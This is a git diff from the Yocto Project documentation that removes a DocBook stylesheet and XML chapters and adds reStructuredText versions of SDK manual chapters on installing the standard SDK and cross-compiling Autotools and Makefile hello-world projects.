-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.writernotes {
- color: #ff0000;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/sdk-manual/sdk-using.rst b/documentation/sdk-manual/sdk-using.rst
new file mode 100644
index 0000000000..4b151e45cb
--- /dev/null
+++ b/documentation/sdk-manual/sdk-using.rst
@@ -0,0 +1,159 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Using the Standard SDK
+**********************
+
+This chapter describes the standard SDK and how to install it.
+Information includes unique installation and setup aspects for the
+standard SDK.
+
+.. note::
+
+ For a side-by-side comparison of main features supported for a
+ standard SDK as compared to an extensible SDK, see the "
+ Introduction
+ " section.
+
+You can use a standard SDK to work on Makefile and Autotools-based
+projects. See the "`Using the SDK Toolchain
+Directly <#sdk-working-projects>`__" chapter for more information.
+
+.. _sdk-standard-sdk-intro:
+
+Why use the Standard SDK and What is in It?
+===========================================
+
+The Standard SDK provides a cross-development toolchain and libraries
+tailored to the contents of a specific image. You would use the Standard
+SDK if you want a more traditional toolchain experience as compared to
+the extensible SDK, which provides an internal build system and the
+``devtool`` functionality.
+
+The installed Standard SDK consists of several files and directories.
+Basically, it contains an SDK environment setup script, some
+configuration files, and host and target root filesystems to support
+usage. You can see the directory structure in the "`Installed Standard
+SDK Directory
+Structure <#sdk-installed-standard-sdk-directory-structure>`__" section.
+
+.. _sdk-installing-the-sdk:
+
+Installing the SDK
+==================
+
+The first thing you need to do is install the SDK on your :term:`Build
+Host` by running the ``*.sh`` installation script.
+
+You can download a tarball installer, which includes the pre-built
+toolchain, the ``runqemu`` script, and support files from the
+appropriate :yocto_dl:`toolchain </releases/yocto/yocto-3.1.2/toolchain/>` directory within
+the Index of Releases. Toolchains are available for several 32-bit and
+64-bit architectures with the ``x86_64`` directories, respectively. The
+toolchains the Yocto Project provides are based off the
+``core-image-sato`` and ``core-image-minimal`` images and contain
+libraries appropriate for developing against that image.
+
+The names of the tarball installer scripts are such that a string
+representing the host system appears first in the filename and then is
+immediately followed by a string representing the target architecture.
+::
+
+ poky-glibc-host_system-image_type-arch-toolchain-release_version.sh
+
+ Where:
+ host_system is a string representing your development system:
+
+ i686 or x86_64.
+
+ image_type is the image for which the SDK was built:
+
+ core-image-minimal or core-image-sato.
+
+ arch is a string representing the tuned target architecture:
+
+ aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon.
+
+ release_version is a string representing the release number of the Yocto Project:
+
+ 3.1.2, 3.1.2+snapshot
+
+For example, the following SDK installer is for a 64-bit
+development host system and a i586-tuned target architecture based off
+the SDK for ``core-image-sato`` and using the current DISTRO snapshot:
+::
+
+ poky-glibc-x86_64-core-image-sato-i586-toolchain-DISTRO.sh
+
+.. note::
+
+ As an alternative to downloading an SDK, you can build the SDK
+ installer. For information on building the installer, see the "
+ Building an SDK Installer
+ " section.
+
+The SDK and toolchains are self-contained and by default are installed
+into the ``poky_sdk`` folder in your home directory. You can choose to
+install the extensible SDK in any location when you run the installer.
+However, because files need to be written under that directory during
+the normal course of operation, the location you choose for installation
+must be writable for whichever users need to use the SDK.
+
+The following command shows how to run the installer given a toolchain
+tarball for a 64-bit x86 development host system and a 64-bit x86 target
+architecture. The example assumes the SDK installer is located in
+``~/Downloads/`` and has execution rights.
+
+.. note::
+
+ If you do not have write permissions for the directory into which you
+ are installing the SDK, the installer notifies you and exits. For
+ that case, set up the proper permissions in the directory and run the
+ installer again.
+
+::
+
+ $ ./Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-3.1.2.sh
+ Poky (Yocto Project Reference Distro) SDK installer version 3.1.2
+ ===============================================================
+ Enter target directory for SDK (default: /opt/poky/3.1.2):
+ You are about to install the SDK to "/opt/poky/3.1.2". Proceed [Y/n]? Y
+ Extracting SDK........................................ ..............................done
+ Setting it up...done
+ SDK has been successfully set up and is ready to be used.
+ Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+ $ . /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+Again, reference the "`Installed Standard SDK Directory
+Structure <#sdk-installed-standard-sdk-directory-structure>`__" section
+for more details on the resulting directory structure of the installed
+SDK.
+
+.. _sdk-running-the-sdk-environment-setup-script:
+
+Running the SDK Environment Setup Script
+========================================
+
+Once you have the SDK installed, you must run the SDK environment setup
+script before you can actually use the SDK. This setup script resides in
+the directory you chose when you installed the SDK, which is either the
+default ``/opt/poky/3.1.2`` directory or the directory you chose during
+installation.
+
+Before running the script, be sure it is the one that matches the
+architecture for which you are developing. Environment setup scripts
+begin with the string "``environment-setup``" and include as part of
+their name the tuned target architecture. As an example, the following
+commands set the working directory to where the SDK was installed and
+then source the environment setup script. In this example, the setup
+script is for an IA-based target machine using i586 tuning:
+::
+
+ $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+When you run the
+setup script, the same environment variables are defined as are when you
+run the setup script for an extensible SDK. See the "`Running the
+Extensible SDK Environment Setup
+Script <#sdk-running-the-extensible-sdk-environment-setup-script>`__"
+section for more information.
diff --git a/documentation/sdk-manual/sdk-using.xml b/documentation/sdk-manual/sdk-using.xml
deleted file mode 100644
index 66b15cd6ce..0000000000
--- a/documentation/sdk-manual/sdk-using.xml
+++ /dev/null
@@ -1,200 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-using-the-standard-sdk'>
- <title>Using the Standard SDK</title>
-
- <para>
- This chapter describes the standard SDK and how to install it.
- Information includes unique installation and setup aspects for the
- standard SDK.
- <note>
- For a side-by-side comparison of main features supported for a
- standard SDK as compared to an extensible SDK, see the
- "<link linkend='sdk-manual-intro'>Introduction</link>"
- section.
- </note>
- </para>
-
- <para>
- You can use a standard SDK to work on Makefile and Autotools-based
- projects.
- See the
- "<link linkend='sdk-working-projects'>Using the SDK Toolchain Directly</link>"
- chapter for more information.
- </para>
-
- <section id='sdk-standard-sdk-intro'>
- <title>Why use the Standard SDK and What is in It?</title>
-
- <para>
- The Standard SDK provides a cross-development toolchain and
- libraries tailored to the contents of a specific image.
- You would use the Standard SDK if you want a more traditional
- toolchain experience as compared to the extensible SDK, which
- provides an internal build system and the
- <filename>devtool</filename> functionality.
- </para>
-
- <para>
- The installed Standard SDK consists of several files and
- directories.
- Basically, it contains an SDK environment setup script, some
- configuration files, and host and target root filesystems to
- support usage.
- You can see the directory structure in the
- "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
- section.
- </para>
- </section>
-
- <section id='sdk-installing-the-sdk'>
- <title>Installing the SDK</title>
-
- <para>
- The first thing you need to do is install the SDK on your
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
- by running the <filename>*.sh</filename> installation script.
- </para>
-
- <para>
- You can download a tarball installer, which includes the
- pre-built toolchain, the <filename>runqemu</filename>
- script, and support files from the appropriate
- <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'>toolchain</ulink>
- directory within the Index of Releases.
- Toolchains are available for several 32-bit and 64-bit
- architectures with the <filename>x86_64</filename> directories,
- respectively.
- The toolchains the Yocto Project provides are based off the
- <filename>core-image-sato</filename> and
- <filename>core-image-minimal</filename> images and contain
- libraries appropriate for developing against that image.
- </para>
-
- <para>
- The names of the tarball installer scripts are such that a
- string representing the host system appears first in the
- filename and then is immediately followed by a string
- representing the target architecture.
- <literallayout class='monospaced'>
- poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-<replaceable>release_version</replaceable>.sh
-
- Where:
- <replaceable>host_system</replaceable> is a string representing your development system:
-
- i686 or x86_64.
-
- <replaceable>image_type</replaceable> is the image for which the SDK was built:
-
- core-image-minimal or core-image-sato.
-
- <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
- aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon.
-
- <replaceable>release_version</replaceable> is a string representing the release number of the Yocto Project:
-
- &DISTRO;, &DISTRO;+snapshot
- </literallayout>
- For example, the following SDK installer is for a 64-bit
- development host system and a i586-tuned target architecture
- based off the SDK for <filename>core-image-sato</filename> and
- using the current &DISTRO; snapshot:
- <literallayout class='monospaced'>
- poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- </literallayout>
- <note>
- As an alternative to downloading an SDK, you can build the
- SDK installer.
- For information on building the installer, see the
- "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
- section.
- </note>
- </para>
-
- <para>
- The SDK and toolchains are self-contained and by default are
- installed into the <filename>poky_sdk</filename> folder in your
- home directory.
- You can choose to install the extensible SDK in any location when
- you run the installer.
- However, because files need to be written under that directory
- during the normal course of operation, the location you choose
- for installation must be writable for whichever
- users need to use the SDK.
- </para>
-
- <para>
- The following command shows how to run the installer given a
- toolchain tarball for a 64-bit x86 development host system and
- a 64-bit x86 target architecture.
- The example assumes the SDK installer is located in
- <filename>~/Downloads/</filename> and has execution rights.
- <note>
- If you do not have write permissions for the directory
- into which you are installing the SDK, the installer
- notifies you and exits.
- For that case, set up the proper permissions in the directory
- and run the installer again.
- </note>
- <literallayout class='monospaced'>
- $ ./Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- Poky (Yocto Project Reference Distro) SDK installer version &DISTRO;
- ===============================================================
- Enter target directory for SDK (default: /opt/poky/&DISTRO;):
- You are about to install the SDK to "/opt/poky/&DISTRO;". Proceed [Y/n]? Y
- Extracting SDK........................................ ..............................done
- Setting it up...done
- SDK has been successfully set up and is ready to be used.
- Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
- $ . /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- </literallayout>
- </para>
-
- <para>
- Again, reference the
- "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
- section for more details on the resulting directory structure of
- the installed SDK.
- </para>
- </section>
-
- <section id='sdk-running-the-sdk-environment-setup-script'>
- <title>Running the SDK Environment Setup Script</title>
-
- <para>
- Once you have the SDK installed, you must run the SDK environment
- setup script before you can actually use the SDK.
- This setup script resides in the directory you chose when you
- installed the SDK, which is either the default
- <filename>/opt/poky/&DISTRO;</filename> directory or the directory
- you chose during installation.
- </para>
-
- <para>
- Before running the script, be sure it is the one that matches the
- architecture for which you are developing.
- Environment setup scripts begin with the string
- "<filename>environment-setup</filename>" and include as part of
- their name the tuned target architecture.
- As an example, the following commands set the working directory
- to where the SDK was installed and then source the environment
- setup script.
- In this example, the setup script is for an IA-based
- target machine using i586 tuning:
- <literallayout class='monospaced'>
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- </literallayout>
- When you run the setup script, the same environment variables are
- defined as are when you run the setup script for an extensible SDK.
- See the
- "<link linkend='sdk-running-the-extensible-sdk-environment-setup-script'>Running the Extensible SDK Environment Setup Script</link>"
- section for more information.
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-working-projects.rst b/documentation/sdk-manual/sdk-working-projects.rst
new file mode 100644
index 0000000000..5c828fd586
--- /dev/null
+++ b/documentation/sdk-manual/sdk-working-projects.rst
@@ -0,0 +1,423 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+********************************
+Using the SDK Toolchain Directly
+********************************
+
+You can use the SDK toolchain directly with Makefile and Autotools-based
+projects.
+
+Autotools-Based Projects
+========================
+
+Once you have a suitable :ref:`sdk-manual/sdk-intro:the cross-development toolchain`
+installed, it is very easy to develop a project using the `GNU
+Autotools-based <https://en.wikipedia.org/wiki/GNU_Build_System>`__
+workflow, which is outside of the :term:`OpenEmbedded Build System`.
+
+The following figure presents a simple Autotools workflow.
+
+.. image:: figures/sdk-autotools-flow.png
+ :align: center
+
+Follow these steps to create a simple Autotools-based "Hello World"
+project:
+
+.. note::
+
+ For more information on the GNU Autotools workflow, see the same
+ example on the
+ GNOME Developer
+ site.
+
+1. *Create a Working Directory and Populate It:* Create a clean
+ directory for your project and then make that directory your working
+ location.
+ ::
+
+ $ mkdir $HOME/helloworld
+ $ cd $HOME/helloworld
+
+ After setting up the directory, populate it with files needed for the flow.
+ You need a project source file, a file to help with configuration,
+ and a file to help create the Makefile, and a README file:
+ ``hello.c``, ``configure.ac``, ``Makefile.am``, and ``README``,
+ respectively.
+
+ Use the following command to create an empty README file, which is
+ required by GNU Coding Standards:
+ ::
+
+ $ touch README
+
+ Create the remaining
+ three files as follows:
+
+ - ``hello.c``:
+ ::
+
+ #include <stdio.h>
+
+ main()
+ {
+ printf("Hello World!\n");
+ }
+
+ - ``configure.ac``:
+ ::
+
+ AC_INIT(hello,0.1)
+ AM_INIT_AUTOMAKE([foreign])
+ AC_PROG_CC
+ AC_CONFIG_FILES(Makefile)
+ AC_OUTPUT
+
+ - ``Makefile.am``:
+ ::
+
+ bin_PROGRAMS = hello
+ hello_SOURCES = hello.c
+
+2. *Source the Cross-Toolchain Environment Setup File:* As described
+ earlier in the manual, installing the cross-toolchain creates a
+ cross-toolchain environment setup script in the directory that the
+ SDK was installed. Before you can use the tools to develop your
+ project, you must source this setup script. The script begins with
+ the string "environment-setup" and contains the machine architecture,
+ which is followed by the string "poky-linux". For this example, the
+ command sources a script from the default SDK installation directory
+ that uses the 32-bit Intel x86 Architecture and the 3.1.2 Yocto
+ Project release:
+ ::
+
+ $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+3. *Create the configure Script:* Use the ``autoreconf`` command to
+ generate the ``configure`` script.
+ ::
+
+ $ autoreconf
+
+ The ``autoreconf``
+ tool takes care of running the other Autotools such as ``aclocal``,
+ ``autoconf``, and ``automake``.
+
+ .. note::
+
+ If you get errors from
+ configure.ac
+ , which
+ autoreconf
+ runs, that indicate missing files, you can use the "-i" option,
+ which ensures missing auxiliary files are copied to the build
+ host.
+
+4. *Cross-Compile the Project:* This command compiles the project using
+ the cross-compiler. The
+ :term:`CONFIGURE_FLAGS`
+ environment variable provides the minimal arguments for GNU
+ configure:
+ ::
+
+ $ ./configure ${CONFIGURE_FLAGS}
+
+ For an Autotools-based
+ project, you can use the cross-toolchain by just passing the
+ appropriate host option to ``configure.sh``. The host option you use
+ is derived from the name of the environment setup script found in the
+ directory in which you installed the cross-toolchain. For example,
+ the host option for an ARM-based target that uses the GNU EABI is
+ ``armv5te-poky-linux-gnueabi``. You will notice that the name of the
+ script is ``environment-setup-armv5te-poky-linux-gnueabi``. Thus, the
+ following command works to update your project and rebuild it using
+ the appropriate cross-toolchain tools:
+ ::
+
+ $ ./configure --host=armv5te-poky-linux-gnueabi --with-libtool-sysroot=sysroot_dir
+
+5. *Make and Install the Project:* These two commands generate and
+ install the project into the destination directory:
+ ::
+
+ $ make
+ $ make install DESTDIR=./tmp
+
+ .. note::
+
+ To learn about environment variables established when you run the
+ cross-toolchain environment setup script and how they are used or
+ overridden when the Makefile, see the "
+ Makefile-Based Projects
+ " section.
+
+ This next command is a simple way to verify the installation of your
+ project. Running the command prints the architecture on which the
+ binary file can run. This architecture should be the same
+ architecture that the installed cross-toolchain supports.
+ ::
+
+ $ file ./tmp/usr/local/bin/hello
+
+6. *Execute Your Project:* To execute the project, you would need to run
+ it on your target hardware. If your target hardware happens to be
+ your build host, you could run the project as follows:
+ ::
+
+ $ ./tmp/usr/local/bin/hello
+
+ As expected, the project displays the "Hello World!" message.
+
+Makefile-Based Projects
+=======================
+
+Simple Makefile-based projects use and interact with the cross-toolchain
+environment variables established when you run the cross-toolchain
+environment setup script. The environment variables are subject to
+general ``make`` rules.
+
+This section presents a simple Makefile development flow and provides an
+example that lets you see how you can use cross-toolchain environment
+variables and Makefile variables during development.
+
+.. image:: figures/sdk-makefile-flow.png
+ :align: center
+
+The main point of this section is to explain the following three cases
+regarding variable behavior:
+
+- *Case 1 - No Variables Set in the Makefile Map to Equivalent
+ Environment Variables Set in the SDK Setup Script:* Because matching
+ variables are not specifically set in the ``Makefile``, the variables
+ retain their values based on the environment setup script.
+
+- *Case 2 - Variables Are Set in the Makefile that Map to Equivalent
+ Environment Variables from the SDK Setup Script:* Specifically
+ setting matching variables in the ``Makefile`` during the build
+ results in the environment settings of the variables being
+ overwritten. In this case, the variables you set in the ``Makefile``
+ are used.
+
+- *Case 3 - Variables Are Set Using the Command Line that Map to
+ Equivalent Environment Variables from the SDK Setup Script:*
+ Executing the ``Makefile`` from the command line results in the
+ environment variables being overwritten. In this case, the
+ command-line content is used.
+
+.. note::
+
+ Regardless of how you set your variables, if you use the "-e" option
+ with
+ make
+ , the variables from the SDK setup script take precedence:
+ ::
+
+ $ make -e target
+
+
+The remainder of this section presents a simple Makefile example that
+demonstrates these variable behaviors.
+
+In a new shell environment variables are not established for the SDK
+until you run the setup script. For example, the following commands show
+a null value for the compiler variable (i.e.
+:term:`CC`).
+::
+
+ $ echo ${CC}
+
+ $
+
+Running the
+SDK setup script for a 64-bit build host and an i586-tuned target
+architecture for a ``core-image-sato`` image using the current 3.1.2
+Yocto Project release and then echoing that variable shows the value
+established through the script:
+::
+
+ $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+ $ echo ${CC}
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/3.1.2/sysroots/i586-poky-linux
+
+To illustrate variable use, work through this simple "Hello World!"
+example:
+
+1. *Create a Working Directory and Populate It:* Create a clean
+ directory for your project and then make that directory your working
+ location.
+ ::
+
+ $ mkdir $HOME/helloworld
+ $ cd $HOME/helloworld
+
+ After
+ setting up the directory, populate it with files needed for the flow.
+ You need a ``main.c`` file from which you call your function, a
+ ``module.h`` file to contain headers, and a ``module.c`` that defines
+ your function.
+
+ Create the three files as follows:
+
+ - ``main.c``:
+ ::
+
+ #include "module.h"
+ void sample_func();
+ int main()
+ {
+ sample_func();
+ return 0;
+ }
+
+ - ``module.h``:
+ ::
+
+ #include <stdio.h>
+ void sample_func();
+
+ - ``module.c``:
+ ::
+
+ #include "module.h"
+ void sample_func()
+ {
+ printf("Hello World!");
+ printf("\n");
+ }
+
+2. *Source the Cross-Toolchain Environment Setup File:* As described
+ earlier in the manual, installing the cross-toolchain creates a
+ cross-toolchain environment setup script in the directory that the
+ SDK was installed. Before you can use the tools to develop your
+ project, you must source this setup script. The script begins with
+ the string "environment-setup" and contains the machine architecture,
+ which is followed by the string "poky-linux". For this example, the
+ command sources a script from the default SDK installation directory
+ that uses the 32-bit Intel x86 Architecture and the DISTRO_NAME Yocto
+ Project release:
+ ::
+
+ $ source /opt/poky/DISTRO/environment-setup-i586-poky-linux
+
+3. *Create the Makefile:* For this example, the Makefile contains
+ two lines that can be used to set the ``CC`` variable. One line is
+ identical to the value that is set when you run the SDK environment
+ setup script, and the other line sets ``CC`` to "gcc", the default
+ GNU compiler on the build host:
+ ::
+
+ # CC=i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
+ # CC="gcc"
+ all: main.o module.o
+ ${CC} main.o module.o -o target_bin
+ main.o: main.c module.h
+ ${CC} -I . -c main.c
+ module.o: module.c
+ module.h ${CC} -I . -c module.c
+ clean:
+ rm -rf *.o
+ rm target_bin
+
+4. *Make the Project:* Use the ``make`` command to create the binary
+ output file. Because variables are commented out in the Makefile, the
+ value used for ``CC`` is the value set when the SDK environment setup
+ file was run:
+ ::
+
+ $ make
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+
+ From the results of the previous command, you can see that
+ the compiler used was the compiler established through the ``CC``
+ variable defined in the setup script.
+
+ You can override the ``CC`` environment variable with the same
+ variable as set from the Makefile by uncommenting the line in the
+ Makefile and running ``make`` again.
+ ::
+
+ $ make clean
+ rm -rf *.o
+ rm target_bin
+ #
+ # Edit the Makefile by uncommenting the line that sets CC to "gcc"
+ #
+ $ make
+ gcc -I . -c main.c
+ gcc -I . -c module.c
+ gcc main.o module.o -o target_bin
+
+ As shown in the previous example, the
+ cross-toolchain compiler is not used. Rather, the default compiler is
+ used.
+
+ This next case shows how to override a variable by providing the
+ variable as part of the command line. Go into the Makefile and
+ re-insert the comment character so that running ``make`` uses the
+ established SDK compiler. However, when you run ``make``, use a
+ command-line argument to set ``CC`` to "gcc":
+ ::
+
+ $ make clean
+ rm -rf *.o
+ rm target_bin
+ #
+ # Edit the Makefile to comment out the line setting CC to "gcc"
+ #
+ $ make
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+ $ make clean
+ rm -rf *.o
+ rm target_bin
+ $ make CC="gcc"
+ gcc -I . -c main.c
+ gcc -I . -c module.c
+ gcc main.o module.o -o target_bin
+
+ In the previous case, the command-line argument overrides the SDK
+ environment variable.
+
+ In this last case, edit Makefile again to use the "gcc" compiler but
+ then use the "-e" option on the ``make`` command line:
+ ::
+
+ $ make clean
+ rm -rf *.o
+ rm target_bin
+ #
+ # Edit the Makefile to use "gcc"
+ #
+ $ make
+ gcc -I . -c main.c
+ gcc -I . -c module.c
+ gcc main.o module.o -o target_bin
+ $ make clean
+ rm -rf *.o
+ rm target_bin
+ $ make -e
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+
+ In the previous case, the "-e" option forces ``make`` to
+ use the SDK environment variables regardless of the values in the
+ Makefile.
+
+5. *Execute Your Project:* To execute the project (i.e. ``target_bin``),
+ use the following command:
+ ::
+
+ $ ./target_bin
+ Hello World!
+
+ .. note::
+
+ If you used the cross-toolchain compiler to build
+ target_bin
+ and your build host differs in architecture from that of the
+ target machine, you need to run your project on the target device.
+
+ As expected, the project displays the "Hello World!" message.
diff --git a/documentation/sdk-manual/sdk-working-projects.xml b/documentation/sdk-manual/sdk-working-projects.xml
deleted file mode 100644
index 521271d54c..0000000000
--- a/documentation/sdk-manual/sdk-working-projects.xml
+++ /dev/null
@@ -1,510 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-working-projects'>
-
- <title>Using the SDK Toolchain Directly</title>
-
- <para>
- You can use the SDK toolchain directly with Makefile and
- Autotools-based projects.
- </para>
-
- <section id='autotools-based-projects'>
- <title>Autotools-Based Projects</title>
-
- <para>
- Once you have a suitable
- <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>cross-development toolchain</ulink>
- installed, it is very easy to develop a project using the
- <ulink url='https://en.wikipedia.org/wiki/GNU_Build_System'>GNU Autotools-based</ulink>
- workflow, which is outside of the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- </para>
-
- <para>
- The following figure presents a simple Autotools workflow.
- <imagedata fileref="figures/sdk-autotools-flow.png" width="7in" height="8in" align="center" />
- </para>
-
- <para>
- Follow these steps to create a simple Autotools-based
- "Hello World" project:
- <note>
- For more information on the GNU Autotools workflow,
- see the same example on the
- <ulink url='https://developer.gnome.org/anjuta-build-tutorial/stable/create-autotools.html.en'>GNOME Developer</ulink>
- site.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Create a Working Directory and Populate It:</emphasis>
- Create a clean directory for your project and then make
- that directory your working location.
- <literallayout class='monospaced'>
- $ mkdir $HOME/helloworld
- $ cd $HOME/helloworld
- </literallayout>
- After setting up the directory, populate it with files
- needed for the flow.
- You need a project source file, a file to help with
- configuration, and a file to help create the Makefile,
- and a README file:
- <filename>hello.c</filename>,
- <filename>configure.ac</filename>,
- <filename>Makefile.am</filename>, and
- <filename>README</filename>, respectively.</para>
-
- <para> Use the following command to create an empty README
- file, which is required by GNU Coding Standards:
- <literallayout class='monospaced'>
- $ touch README
- </literallayout>
- Create the remaining three files as follows:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>hello.c</filename>:</emphasis>
- <literallayout class='monospaced'>
- #include &lt;stdio.h&gt;
-
- main()
- {
- printf("Hello World!\n");
- }
